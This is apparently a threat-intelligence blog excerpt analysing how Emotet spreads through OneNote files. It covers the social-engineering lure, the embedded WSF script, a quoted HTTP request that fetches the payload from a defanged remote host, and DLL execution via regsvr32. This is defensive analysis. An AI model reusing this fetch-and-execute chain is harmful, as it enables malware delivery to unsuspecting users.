https://www.malwarebytes.com/blog/threat-intelligence/2023/03/emotet-onenote
Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.
Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.
The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.
This triggers Windows scripting engine (wscript.exe) to execute the following command:
%Temp%\OneNote\16.0\NT\0\click.wsf”
The heavily obfuscated script retrieves the Emotet binary payload from a remote siteGET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org
The file is saved as a DLL and executed via regsvr32.exe:%Temp%\OneNote\16.0\NT\0\rad44657.tmp.dll”..
Emotet malware now distributed in Microsoft OneNote files to evade defenses
